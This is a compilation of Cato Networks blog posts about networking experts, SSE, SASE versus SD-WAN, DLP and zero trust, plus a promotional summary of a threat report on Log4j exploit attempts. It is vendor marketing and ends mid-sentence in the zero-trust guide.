15 Networking Experts To Follow on LinkedIn

Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which...
15 Networking Experts To Follow on LinkedIn Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which address the problems de jour. But how can IT teams and network architects make heads or tails of these rapid shifts? Such intense global and industry-wide changes require the advice of experts who are familiar with both the technical and business landscape, and can speak to the newest technology trends. Below, we’ve listed 15 of the top experts in enterprise networking and SD-WAN that we recommend following on Linkedin. They are masters in their domain, and industry leaders who can help you stay up-to-date with the latest developments in the world of enterprise networking. They have many years of hands-on and consulting experience, so when they speak about enterprise networks, it’s always worth hearing what they have to say. 1. Greg Ferro https://www.linkedin.com/in/etherealmind/ @etherealmind Greg is a co-founder of Packet Pushers, an online media outlet that has covered data, networking and infrastructure for over 12 years. Packet Pushers provides valuable information that can help nearly any professional in the networking field including insights on: public cloud usage, SD-WAN, five minute vendor news, IPv6, and more. Home to a series of podcasts, blog posts, articles, a Spotify channel, and even a newsletter - it’s a multi-media experience. Besides Packet Pushers, Greg runs another well-known industry blog, EtherealMind.com. 2. Ivan Pepelnjak https://www.linkedin.com/in/ivanpepelnjak/ @ioshints Ivan is a blogger at ipSpace.net, an author, a webinar presenter and a network architect. His writings and webinars focus mainly on network automation, software-defined networking, large-scale data center tech, network virtualization technologies and advanced IP-based networks. By following him and/or ipSpace.net, you will have access to a plethora of network technology resources, including online courses, webinars, podcasts and blogs. 3. Orhan Ergun https://www.linkedin.com/in/orhanergun/ @OrhanErgunCCDE Orhan is an IT trainer, an author and a network architect. On Linkedin, Orhan shares his ideas and thoughts, as well as updates about his recent webinars, blog posts and training courses, to his ~40,000 followers. He also spices up his updates by sprinkling in funny memes with inside IT humor. Orhan’s courses can be found on his website at orhanergun.net, where he focuses on network design, routing, the cloud, security and large-scale networks. 4. Jeff Tantsura ​​https://www.linkedin.com/in/jeff-tantsura/ Jeff is a Sr. Principal Network Architect at Azure Networking, as well as a writer, editor, podcaster, patent inventor and advisor to startups in networking and security areas. His podcast, “Between 0x2 Nerds”, is bi-monthly and discusses networking topics including: network complexity, scalability, up-and-coming technologies and more. The podcast hosts industry experts, software engineers, academia researchers and decision-makers - so when listening to it, you can expect to hear from professionals with a wide variety of opinions, points of view and areas of expertise! 5. Daniel Dib https://www.linkedin.com/in/danieldib/ @danieldibswe Daniel Dib is a Senior Network Architect experienced in routing, switching and security. He is also a prolific content creator, writing blog posts for his own networking-focused blog “Lost in Transit”, as well as additional publications, like “Network Computing”. It’s a  great choice if you’re interested in learning more about CCNA, CCNP, CCDP, CCIE, CCDE and all of our various certification courses. His social media posts cover both professional and personal matters, for those of you who like to get to know the person behind the professional.  [boxlink link="https://www.catonetworks.com/resources/4-considerations-to-take-before-renewing-your-sd-wan-product-or-contract/?utm_source=blog&utm_medium=top_cta&utm_campaign="4_considerations_before_sd-wan"] 4 Considerations to Take Before Renewing Your SD-WAN Product or Contract | EBOOK [/boxlink] 6. David Bombal https://www.linkedin.com/in/davidbombal/ @davidbombal David Bombal is an author, instructor and YouTuber, creating content for networking professionals across multiple channels. Focusing on topics like network automation, Python programming, ethical hacking and Cisco exams, his videos, podcasts and courses provide a wide range of resources for beginners and advanced learners. David’s online Discord community is also worth visiting, as an online venue for ongoing IT support and communication. 7. John Chambers https://www.linkedin.com/in/johnchambersjc/ @JohnTChambers John is the CEO of JC2 Ventures and was previously at Cisco for 26 years, serving as CEO, Chairman and President, among other positions. With more than 263,000 followers on Linkedin and more than 22,000 on Twitter, John is an important source of information for networking professionals interested in a broader, more strategic view of the technological market. 8. Tom Hollingsworth https://www.linkedin.com/in/networkingnerd/ @networkingnerd Tom is a networking analyst at Foskett Services and the creator of networkingnerd.net, an online media outlet where he offers a tongue-in-cheek take on networking news and trends. In his latest post he compares Apple Air Tags and lost luggage at airports to SD-WAN. If blog posts aren’t your thing, you can also hear what Tom has to say on his “Tomversations” YouTube playlist or by attending the “Tech Field Day” events he organizes. 9. Matt Conran https://www.linkedin.com/in/matthewconranjnr/ Matt is a cloud and network architecture specialist with more than 20 years of networking experience in support, engineering, network design, security and architecture. Matt juggles consultancy as an independent contractor with publishing technical content on his website “Network Insight” and with creating training courses on Pluralsight. On his website, you can find helpful explainer videos and posts on a variety of networking topics including cloud security, observability, SD-WAN and more. 10. Russ White https://www.linkedin.com/in/riw777/ @rtggeek Russ White is an infrastructure architect, co-host of “The Hedge”, a computer network podcast, and blogger. He has also published a number of books on network architecture. His Linkedin posts are a bulletin board of his latest blog and podcast updates, so by following him you can stay on track of his latest publications, ranking from hands-on network advice to info on how technology will be shaped by global events. 11. Ben Hendrick www.linkedin.com/in/bhendrick/ Ben is the Chief Architect in the Office of the CTO of the Global Secure Infrastructure Domain at Microsoft. His Linkedin posts focus mainly on recent cybersecurity updates, covering specific events as well as industry trends. With nearly 35 years of network and security experience, you can be sure his daily updates are based on broad insights and a deep familiarity with the networking and security space. 12. Ashish Nadkarni https://www.linkedin.com/in/ashishnadkarni/ @ashish_nadkarni Ashish leads two research groups at analyst firm IDC. Both of them - Infrastructure Systems, Platforms and Technologies (ISPTG) and BuyerView Research - are part of IDC's Worldwide Enterprise Infrastructure practice. Ashish delivers reports, blog posts and webinars, and his Linkedin feed to keep up with the latest trends and technologies in networking. Examples of his previous posts include preparing for IT infrastructure supply shortages, storage for AI workloads, and takeaways from networking industry events. 13. Erik Fritzler https://www.linkedin.com/in/erikfritzler/ @FritzlerErik Erik has nearly 25 years of experience in network architecture and regularly posts blogs on “Network World”. He specializes in SD-WAN, Network Design, and Engineering and IT Security. In his recent blog post “Why WAN metrics are not enough in SD-WAN policy enforcement”, he discusses how SD-WAN captures metrics that go far beyond the typical WAN measurements including application response time, network transfer time, and server response time. 14. Matt Simmons https://www.linkedin.com/in/mattsimmonssysadmin/ @standaloneSA Matt is an SRE at SpaceX, where he is responsible for the infrastructure around the ground control plane. His team owns the OS installation on bare metal, up through the Kubernetes orchestration layer, as well as monitoring, CI/CD and more. If you’re interested in learning about technological “How To’s” and the science of space, Matt’s Linkedin is the place for you. Matt also has a Github repository where he hosts projects and experiments that may be helpful to networking professionals. 15. Cato Networks https://www.linkedin.com/company/cato-networks/ https://twitter.com/CatoNetworks Did you know that Cato Networks is also on social? Our social channels are a great way to keep on top of SASE and Security Service Edge (SSE) updates, read original research and even get access to “member only” exclusive events. We run surveys, host giveaways and include updates from industry experts, like our CEO and COO, Shlomo Kramer (co-founder of Check Point,) and Gur Shatz (co-founder of Imperva). Who Do You Follow? As business needs and technologies evolve, it can be difficult to constantly keep up with the changes. Experts like the 15 listed above can help, by passing on their know-how, insights and experience through their Linkedin, blogs, Youtube channels, or whatever way you prefer to consume content. So, who do you follow? Share with us on Linkedin.

SSE (Security Service Edge): The Complete Guide to Getting Started

In 2021, Gartner introduced a new security category – SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in...
SSE (Security Service Edge): The Complete Guide to Getting Started In 2021, Gartner introduced a new security category - SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in learning more information, we highly recommend you read the complete whitepaper.  What is SSE? Before we explain SSE, let’s start by giving more context. In 2019, Gartner introduced the new SASE market category. SASE (Secure Access Service Edge) is the convergence of SD-WAN and network security as a cloud-native, globally-delivered service. As a result, SASE solutions can provide work from anywhere (WFA users)  with optimized and secure access to any application. From the security side, SASE includes SWG, CASB/DLP, FWaaS and ZTNA.  Then, in 2021, Gartner introduced another related market category called SSE (Security Service Edge). SSE offers a more limited scope of converged network security than SASE. SSE converges SWG, CASB/DLP and ZTNA security point solutions, into a single, cloud-native service. Therefore, SSE provides secure access to internet and SaaS applications, but does not address the network connectivity and east-west WAN security aspects of that access, which remains as a separate technology stack.  [boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink] SSE vs. SASE To sum up the comparison:   SASE Traditional SSE Services Year Introduced 2019 2021 Technological Pillars Converged Networking and Network Security Limited convergence of network security only Key Components SD-WAN, SWG, CASB/DLP, FWaaS, ZTNA, RBI, Unified Management SWG, CASB/DLP and ZTNABusiness Value Resiliency, security, optimization, visibility and control Limited network security (secure access to SaaS and web traffic)  Why Do Businesses Need SSE?  (Traditional SSE Capabilities and Benefits)  Optimized and secure global access to internet and SaaS applications and data is essential for businesses’ technical requirements and the evolving threat landscape. But rigid security architectures and disjointed point solutions lower business agility and increase risk. This is where SSE shines.  SSE provides:  Consistent security policy enforcement - full inspection of traffic between any two edges while enforcing threat prevention and data protection policies Reduced attack surface with Zero Trust Network Access (ZTNA) - ensuring users can only access authorized applications Elastic, high performance security inspection - securing traffic at scale through a global backbone of scalable Points of Presence (PoPs) Improved security posture - monitoring the threat landscape and deploying mitigations to emerging threats through the SSE provider’s SOC (instead of the IT staff) Reduced enterprise IT workload without customer involvement - continuously updating the cloud service with new enhancements and fixes, while reducing workload  As a result of these benefits, SSE offers businesses secure public cloud and web access,  threat detection and prevention capabilities, secure and optimized remote access and sensitive Data Loss Prevention.  How to Get Started with SSE Today, many businesses are still using legacy architectures. This impedes digital transformation because:  Legacy networks are built around physical corporate locations - a digital architecture requires re-architecture of the network  Centralized (backhauling) security models slow down secure cloud access - direct secure Internet should be available at any location for any user  Legacy security solutions can’t scale - they can’t support a hybrid workforce working from anywhere  Disjointed solutions are fragmented and complex to manage - this requires more work from IT and increases the likelihood of manual configuration errors  To get started with SSE, businesses should choose an SSE vendor that can help them overcome these challenges. Such a vendor will provide total visibility and control across all edges and all traffic, support a global footprint with high performance security, converge management and analytics with a single pane of glass, ensure a future proof and resilient SSE service.  Introducing Cato SSE 360: Going Beyond Gartner’s SSE Cato SSE 360 goes beyond Gartner’s scope of SSE, to provide total visibility, optimization and control for all traffic, users, devices, and applications everywhere. Not only does it provide secure and optimized access to the internet and public cloud applications, but also to WAN resources and cloud datacenters, reducing your attack surface and eliminating the need for additional point solutions like firewalls, WAN optimizers and global backbones. And, Cato SSE 360 provides a clear path to single-vendor SASE convergence through gradual migration, if and when your organization requires. Follow the link for more information about Cato SSE 360. Cato SSE 360 reduces cost and complexity with simple management through a single pane of glass, self-healing architecture and defenses that evolve automatically while mitigating emerging threats. Customers can choose to manage themselves or co-manage with partners.  Platform overview:  Cato SSE 360 Components  Cato SSE 360 provides the following platform components:  Cloud-native security service edge Cato global private backbone Cato SDP clients IPsec-enabled devices and Cato Socket SD-WAN for locations Comprehensive management application for analytics and policy configuration  As a result, Cato SSE 360 is ideal for the following use cases:  Scalable hybrid work  Gradual cloud migration Secure sensitive data Instant deployment of security capabilities Future-proofing and ongoing security maintenance Seamless, single-vendor SASE convergence  Cato SSE 360 extends SSE by providing full visibility and control across all traffic, optimized global application access and is the only service which supports a seamless path to a complete, single-vendor SASE, if and when required. Read the full Cato SSE 360 whitepaper and get started on your SSE journey today.

Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report

Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web...
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability. Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability have increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including cyber-attacks on Ukrainian organizations. Interestingly, number two on the list of the top five CVE exploit attempts was a Java vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double than previous quarter) to exploit this vulnerability for initial access. Above research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell or CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk. [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink] Majority of Exploitation Events Originated in the U.S. Understanding where attacks originate from or who (or where) the malware communicates to is a critical part of any organization's threat response strategy. Attackers are aware of the fact that traffic to or from certain countries may be blocked, inspected or investigated and that’s the reason why a majority of them ensure that their command and control (C&C) infrastructure is hosted in a country that is labeled as “safe”. While the U.S. is the most favored destination (hosts 17.3 billion C&C servers), China comes second (with 2 billion C&C servers), followed by Germany (1.66 billion), UK (1.29 billion) and Japan (1 billion). Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations. Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter. Attackers Are Frequently Scanning Network Hardware and Software For Initial Access Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all, once adversaries have initial access they actively search data from local systems (T1005 - 9.5 million incidents), look for valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not accessible (T1110 - 6.9 million incidents). Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short form video-haring app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.   What Can Organizations Do To Protect Themselves? While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help: Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.Patch all applications regularly and ensure they are running the most up-to-date software.Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time till they are able to apply necessary and permanent fixes.Train staff regularly so they do not fall prey to phishing and social engineering scams.Try and restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments as this can significantly minimize risk and lower possibility of infectious lateral movement.Be vigilant, have reporting and monitoring processes in place and be on guard for any changes in the attack surface. Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.

Is SD-WAN Really Dead?

Happy To Announce the Birth of a New Technology – SD-WAN It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along...
Is SD-WAN Really Dead? Happy To Announce the Birth of a New Technology - SD-WAN It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along came yet another even more exciting newborn, the Secure Access Service Edge (SASE). It would give us even more – more security, better remote access, and faster deployment. SD-WAN? That’s so yesteryear – or is it? Is SD-WAN another networking technology to be cast off and forgotten in this SASE world, or does SD-WAN continue to play an important role? Let’s find out. SD-WAN: The Toddler Years When SD-WAN was born, there was much to love. It was cute, shiny, and taught enterprises how to walk -- walk away, that is, from MPLS – to a network designed for the new world.  MPLS came of age when users worked in offices, resources resided in the datacenter, and the Internet was an afterthought. It was hopelessly out of step with a world that needed to move fast and one obsessed with the Internet. SD-WAN addressed those problems, creating an intelligent overlay that allowed companies to tap commodity Internet connections to overcome the limitations of MPLS. More specifically this meant: More capacity to improve application performanceReduced network costs by using affordable Internet access, not high-priced MPLS capacity.More bandwidth flexibility by aggregating Internet last mile connectionsImproved last-mile availability by connecting sites through active/active connectionsFaster deployments allowing sites to be connected in days not months [boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink] SD-WAN: The Teenager That Disappoints But then the world changed – again. Resources moved into the cloud and the pandemic sent everyone home. Suddenly the office was no longer the focus of work. Solving the site-to-site communications challenge was no longer sufficient. Now companies needed a way to bring advanced security to wherever resources resided, in the cloud or the private data center, and wherever users worked, in the office, at home, or on the road, and do all of that without compromising performance. None of that was in SD-WAN's job description, making the following use cases particularly challenging: Remote Workforce SD-WAN lacks support for remote access -- period. There was no mobile client to join an SD-WAN. But today secure remote access is an essential pillar for guaranteeing business continuity. Cloud Readiness SD-WAN is limited in its cloud readiness. As an appliance-based architecture, SD-WAN requires the management and integration of proprietary appliances to connect with the cloud. Expensive premium cloud connectivity solutions, like AWS Direct Connect or Azure ExpressRoute for optimized cloud connectivity. Global Performance SD-WAN might perform well enough within a region, but the global Internet is too unpredictable for the enterprise. It’s why all SD-WAN players encourage the use of third-party backbones for global connectivity. Such an approach, though, increases the complexity and costs of a deployment, and fails to deliver the benefits of optimized performance. Advanced Security SD-WAN lacks the necessary security to protect branch offices. Next-generation firewall (NGFW), Intrusion Prevention Systems (IPS), Secure Web Gateway (SWG), anti-malware – all necessary components for protecting the enterprise and none of which are provided by SD-WAN. Factoring in the necessary appliances and services for delivering these capabilities significantly increases the cost and complexity of SD-WAN deployments. SD-WAN: The Senior Years So, SD-WAN isn’t perfect, but you might be wondering, why not let it coexist with the rest of the security and networking infrastructure? Just deploy a SWG or a Security Service Edge (SSE) solution. Doing so, though, leads to a network that’s at best managed with separate brains – one for your SD-WAN and another for your security infrastructure – and more likely additional “brains” for handling the rest of your security infrastructure and the global backbone. And with multiple brains, everything becomes more complicated: Forget zero-touch:SD-WAN made noise about claiming to offer zero-touch configuration, but the reality is far different. Without the necessary security capabilities, SD-WANs become far more complicated to deploy, requiring the additional security appliances to be assessed, purchased, delivered to the locations, installed, and integrated. High Availability (HA) becomes a headache:With SD-WAN relying on Internet connections, HA is all but required. But with multiple brains, HA becomes far more challenging. There’s no automated provisioning of resilient connections between devices or services. There’s also no associated dynamic failover, requiring companies to install backup appliances and additional operational time testing failover scenarios. Visibility is limited:Fragmenting data across multiple networking and security systems means you never have a complete view of your network. You can’t spot the network indicators of new threats. Outages become more difficult to troubleshoot with data hiding within multiple appliance logs. Relying on SSE offerings or security services in the cloud won’t fully address the problem. Deployment is still a problem as there’s no automated traffic routing and tunnel creation between SD-WAN devices and cloud security PoPs. Security infrastructure is also unable to consume and share security policies (such as segmentation) between SD-WAN and cloud security vendors. Operationally, SD-WAN devices and cloud services remain distinct, making troubleshooting more challenging and depriving security teams of networking information that could be valuable in hunting for threats. And in the end, reducing to two brains better than four, still leaves you with well, two brains on one network. SD-WAN: It’s Not Dead Just Part of a Bigger Family So, is SD-WAN dead? Hardly. It remains what it always was – an important tool for building the enterprise network. But like the crazy uncle who might great for laughs but not be terribly reliable, SD-WAN has limitations that need to be addressed. What’s needed is an approach that uses SD-WAN to connect locations but addresses its security and deployment limitations. SASE secures and connects the complete enterprise – headquarters, branches in distant locations, users at home or on the road, and resources in the cloud, private datacenters, or on the Internet. With one network securing and connecting the complete enterprise, deployments become easier, visibility improves, and security becomes more consistent. To make that happen, SASE calls for moving the bulk of security and networking processing into a global network of PoPs. SD-WAN devices connect locations to the nearest PoPs; VPNs clients or clientless access connect remote and mobile users. Native cloud connectivity within the PoPs connects IaaS and SaaS resources. Cato is the World’s First and Most Robust Global SASE Platform Cato is the world’s first SASE platform, converging SD-WAN and network security into a global, cloud-native service. Cato optimizes and secures application access for all users and locations, including branch offices, mobile users, and cloud datacenters, and allows enterprises to manage all of them with a single management console with comprehensive network visibility. Cato’s SASE platform has all the advantages of cloud-native architectures, including infinite scalability, elasticity, global reach and low total cost of ownership. Connecting locations to the Cato SASE Cloud is as simple as plugging in a preconfigured Cato Socket appliance, which connect to the nearest of Cato’s 70+ globally dispersed points of presence (PoPs). Mobile users connect to the same PoPs from any device by running the Cato Client. With Cato, new locations or users can be up and running in hours or even minutes, not days or weeks. Security capabilities include Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS). With Cato, customers can easily migrate from MPLS to SD-WAN, optimize global connectivity to on-premises and cloud applications, enable secure branch office Internet access everywhere, and seamlessly integrate cloud datacenters and mobile users into a high-speed network with a zero-trust architecture. So whether it's mergers and acquisitions, global expansion, rapid deployments, or cloud migration, with Cato, the network and your business are ready for whatever is next in your digital transformation journey.

Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)?

The Information Revolution and The Growing Importance of Data We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises. A company’s assets can be divided into two types: tangible vs...
Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)? The Information Revolution and The Growing Importance of Data We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises. A company's assets can be divided into two types: tangible vs intangible. Simply put, tangible assets are those with a physical form factor (or which represents something physical). Intangible assets are those which do not really exist in the conventional sense, such as a company's Intellectual property. Research by Ocean Tomo1 covering the leading 500 companies in the US (S&P 500) shows that in 1975, intangible assets accounted for 13% of their total value. By 2015 it grew to 84% and by 2020 it reached 90%. Figure 1: The value of intangible assets  Simply put, 90% of the value of a modern-era company comes from what it knows, only 10% from what it has. When looking at how these numbers shifted over the last 45 years, we can see how information has become the single most valuable asset for the modern enterprise. Most enterprises, however, do not have the necessary means to effectively protect their data. Let's take a look at why this is, what protecting enterprise data means, and how to choose the right solution for your enterprise. Protecting Your Company's Data With DLP Information has critical value to an enterprise. It is, however, quite difficult to protect, especially considering a great part of it typically resides in the cloud. There are numerous tools aimed at restricting access to enterprise assets, but the most efficient solution to protect the movement of information to and from enterprise assets is Data Loss Prevention (DLP). While DLP solutions have been around for 15 years, their adoption has been limited and mostly by high-end enterprises. The complexity, prohibitive costs and expertise required to obtain and effectively manage DLP solutions has left them beyond the reach of most enterprises. The increasing value of information, the growing adoption of cloud computing, and continued rise in cybercrime, are driving enterprises to the realization that they need to do a better job protecting their data. The need for DLP is clear and imminent, and market interest is rising. Gartner saw a 32% rise in DLP inquiries in 2020 vs the previous year2. But how can enterprises overcome the current adoption barriers and enable DPL protection for their assets? Let us start by looking at the types of DLP solutions and their respective advantages and shortcomings. [boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/?utm_medium=blog_top_cta&utm_campaign=cato_dlp"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato's DLP | Whitepaper [/boxlink] DLP isn't one thing Gartner recognizes three types of DLP solutions2: Enterprise DLP (EDLP)Integral DLP (IDLP)Cloud Service Provider Native DLP (CSP-Native DLP) The above solutions all have their pros and cons, and the acquiring decision-makers need to decide which solution attributes are more important for their use-cases, and which can be compromised. Let us take a deeper look into each one. Enterprise DLP (EDLP) - An enterprise level solution which covers all relevant traffic flows, and which is implemented as a stand-alone solution. EDLPs require adding (yet) another solution to an organization’s security toolbox. This typically requires an expansive project plan and additional expertise, adding complexity and cost to the project. While an EDLP offers a single console and policy management interface for the entire network, it is typically a separate console from the other network security tools (FW, IPS, AM, SWG, etc.). EDLPs will typically add another hop in the security service chain, and thus add latency and impact performance. Figure 2: Enterprise DLP  Integrated DLP (IDLP) - DLP functionality that is added on top of a pre-existing security product such as a Secure Web Gateway (SWG). IDLPs simplify the deployment process and are regarded as a quick win to get DLP up and running quickly and at a reduced cost. IDLPs, however, are limited to the traffic and use cases the base product is intended for. Piggybacking on a SWG, for example, will cover only Internet-bound traffic and may not inspect IaaS traffic. Gaining wider coverage will require adding DLP to additional security products, which will lead to fragmented consoles and policy management. Figure 3: Integrated DLP  CSP-Native DLP - A cloud-based DLP which is deployed in, or provided by, a cloud service provider (CSP). This type of solution is also simple to adopt as it is delivered as a Software as a Service (SaaS) and doesn't require deployment. It is, however, limited to the traffic sent to or from the specific CSP proving it. As most enterprises using cloud platforms are adopting a multi-cloud strategy, getting complete coverage will require using DLP services from several CSPs. Also, this type of solution will typically not cover all SaaS applications and is typically limited to sanctioned applications only. Figure 4: CNP-Native DLP Choosing The Right DLP For Your Enterprise EDLPs typically offer better coverage and enhanced protection, however, the complexity and cost concerns drive security leaders to shy away and look for simpler and cheaper options. An IDLP offers this, but the limited coverage and disjointed consoles and policy management impact their effectiveness and level of protection. CSP-Native DLPs are also simpler to onboard but are cumbersome for multi-cloud deployments and do not cover the critical use-case of unsanctioned applications (AKA Shadow IT). All the above DLP types come with compromises. Ideally, we would want a solution that is easy to deploy and manage, has complete coverage and optimal protection, does not impact performance, and covers unsanctioned applications. The rise of SASE DLP A true Secure Access Service Edge (SASE), or its Secure Service Edge (SSE) subset, offers the best of all worlds. Cato's SASE Cloud, for example, covers all fundamental SASE requirements: All edges - Cato SASE Cloud covers all enterprise users, on-prem or remote, and all applications and services, on-prem, IaaS and SaaS. This means that Cato's SASE-based DLP will have complete coverage of all traffic and all use-cases. Single pass processing - Cato SASE Cloud utilizes Cato's proprietary Singe-Pass Cloud Engine (SPACE), which is based on a modular software platform stack that executes the networking and network security services in parallel. This enables a shared context, enhancing overall protection, and minimizes latency. Adding DLP to a Cato deployment is done by a flip of a switch and requires no additional deployment. Cloud-native - Cato DLP is delivered fully from the cloud and offers all the benefits of a cloud-native solution, including unlimited scalability and inherent high-availability. Since it is part of the Cato SASE Cloud, it is completely CSP-agnostic and supports all leading cloud service providers, making it a true multi-cloud solution. Converged - Cato SASE runs and manages all services as a single solution, enabling configuration, management, and visibility from a single-pane-of-glass management console. Figure 5: SASE/SSE DLP The pros and cons of the different DLP solution types: Figure 6: DLP types, pros and cons The DLP that's in your reach A true SASE solution enables enterprises to adopt a DLP solution that benefits from all the advantages mentioned above, and more. The reduced complexity and costs, lower the traditional barrier of adoption, enabling enterprises of all sizes and levels of expertise to better protect their data. It also eliminates the dilemma of what to compromise on when looking to adopt DLP within your environment. A SASE DLP requires no compromises. Protecting your enterprise's most valuable asset is just a flip of a switch away. To learn more about Cato DLP, read our DLP whitepaper. 1 Harvard Business Review2 DLP market guide 2021 - Gartner

A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments

The Role of the CISO Post-Pandemic  The world has evolved… Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that would be achieved gradually over time. However, Covid turned this completely on its ear, forcing most organizations to accelerate that journey from 2-3 years down to 2-3 months, and doing so...
A CISO’s Guide: Avoiding the Common Pitfalls of Zero Trust Deployments The Role of the CISO Post-Pandemic  The world has evolved... Prior to recent global events, many organizations viewed digital transformation as a slow-moving journey that would be achieved gradually over time. However, Covid turned this completely on its ear, forcing most organizations to accelerate that journey from 2-3 years down to 2-3 months, and doing so without a well-thought-out strategy. Couple this with the rapid rise of Work-From-Anywhere (WFA) and CISOs have realized their traditional security architectures, specifically VPNs, are no longer adequate to ensure only authorized users have access to critical resources.  Collectively, this has made the role of CISO ever more important because, as a result of this accelerated journey, we now have applications everywhere, people everywhere, leading to increased cyber threats everywhere.  The role of CISO has one core imperative: mapping out the company’s security priorities and strategy, then executing this flawlessly to ensure the strongest possible security posture to protect access to critical data.   Zero Trust Is Just a Starting Point This is why Zero Trust has now become top-of-mind for all CISOs. The concept of Zero Trust has been around for more than a decade since first being introduced. Zero Trust mandates that all edges, internal or external, cloud, branch or data center, to be authenticated, authorized and validated before granting or maintaining access to critical data.  In short, Zero Trust is a framework for building holistic security for the modern digital infrastructure and associated data. Considering cyber threats continue to rapidly expand, and chasing down data breeches have become a daily activity, Zero Trust is uniquely equipped to address the modern digital business architecture: WFA workers, supply chains, hybrid cloud, and evolving threats.  It must be noted that Zero Trust is not a single product solution, and CISOs would be well advised to consult the three main standards (Forrester ZTX, Gartner Carta, NIST SP-800-207) as guidance for developing their Zero Trust strategy.  Of the three, to date, NIST SP-800-207 as pictured below, is the most widely adopted framework. Figure 1. In general, the NIST model is a discussion of 2 key functions:  Data plane – this is the collector of data from numerous sources.  These sources can be application data, user device information, user identity information, etc. Control plane – this is the brains of the model as this is responsible for making decisions upon what is considered good, bad, or requiring further clarification.  Together, the control plane and data plane collaborate to determine whether a user should be granted access permissions at any point in time to the resource for which they are requesting. Critical for this to be viable, effective, and scalable, is the 